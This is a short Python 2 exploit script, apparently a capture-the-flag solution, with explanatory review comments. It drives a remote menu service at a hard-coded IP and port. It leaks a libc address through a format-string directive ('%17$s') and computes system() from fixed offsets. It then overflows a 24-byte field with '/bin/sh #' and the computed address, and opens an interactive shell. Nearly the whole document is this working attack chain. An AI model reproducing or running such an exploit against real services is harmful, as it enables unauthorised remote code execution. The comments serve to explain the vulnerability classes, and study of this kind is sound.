# Python 2 script (print statement, str used as a byte buffer) that drives a
# remote menu-style service over a socket helper.  Everything it relies on
# (Remote, pack, unpack, dbg, xlocal) comes from the local `codez` module,
# which is not shown here; pack/unpack are used with struct-style signatures
# ('Q' + 8-byte strings) but that is an assumption -- confirm in codez.
#
# NOTE(review): read as a whole, the interaction suggests the service lets a
# client-supplied string reach a printf-family format (`%17$s` below) and
# accepts more bytes than a 24-byte field holds (fixed 'A' padding followed by
# an address).  Those are the format-string and buffer-overflow classes that
# -Wformat-security, _FORTIFY_SOURCE, PIE/ASLR and stack protectors are meant
# to block; the hard-coded host, port and offsets make this specific to one
# build and one deployment.
from codez import *

# Login token: a 12-digit string, a 4-byte tag, then an 8-byte packed value.
# 0x602040 looks like a fixed (non-PIE) data address -- TODO confirm against the
# target binary.
serial = '615066814080' +'ABCD'
serial += pack('Q',0x602040)

# Alternative local target, left disabled; only the remote endpoint is used.
#r = xlocal()
# Hard-coded remote endpoint (constructed for this one deployment).
r = Remote('175.119.158.133', 23232)
# Debugger hook from codez; what it attaches to is not visible from here.
dbg()

# Wait for the prompt delimiter, send the token, wait for the menu prompt.
r.read(':')
r.write(serial+"\n")
r.read('>>')

# Menu option 1: store a 24-byte field.  The field is a format directive that
# reads the 17th positional argument as a string, delimited by '|' so the
# reply can be split on it, padded with 'A' to exactly 24 bytes; two extra
# bytes follow the field.  Where those two bytes land is target-specific and
# cannot be told from this script.
r.write('1\n')
r.write('|%17$s|'.ljust(24,'A') + "\xae\x0c" + "\n")
r.read('>>')

# Menu option 3: the service echoes the stored field through the format,
# so the '|'-delimited reply carries the bytes the directive dereferenced.
r.write("3\n")
r.read('0x')
leak =r.read('!').split('|')[1]
# Null-pad the leaked bytes to 8 and decode them as one unsigned quadword.
# The variable name says this is memcpy's resolved address -- TODO confirm;
# nothing here checks that the leak is actually 6-8 bytes long.
memcpy = unpack('Q',leak.ljust(8,"\x00"))[0]
print hex(memcpy)

# Fixed deltas from the leaked symbol to the library base and from there to
# system(); both are specific to the target's libc build and must be verified
# against that exact library, otherwise the computed address is meaningless.
libc = memcpy - 133456
print hex(libc)
system = libc + 279504

# Menu option 1 again: the field is now '/bin/sh #' padded to 24 bytes with
# 'A' (the '#' presumably makes a shell treat the padding as a comment --
# confirm), followed by the computed address with its top byte dropped
# ([:-1] keeps 7 of the 8 packed bytes) and a newline.
r.write('1\n')
r.write('/bin/sh #'.ljust(24,'A') + pack('Q',system)[:-1] + "\n")
r.read('>>')
r.read('!')

# Remaining menu choices (2, 0, 3); their meaning is defined by the service
# and is not visible here.  Then hand the connection over to the terminal.
r.write('2\n')
r.write('0\n')
r.write("3\n")
r.interactive()
# Optional pause, left disabled.
#raw_input('e')